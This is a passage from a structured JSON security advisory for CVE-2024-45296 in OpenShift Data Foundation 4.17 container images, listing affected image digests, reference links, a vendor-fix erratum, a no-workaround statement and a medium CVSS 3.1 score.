"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45296"
},
{
"category": "external",
"summary": "RHBZ#2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f",
"url": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6",
"url": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j",
"url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j"
}
],
"release_date": "2024-09-09T19:15:13.330000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
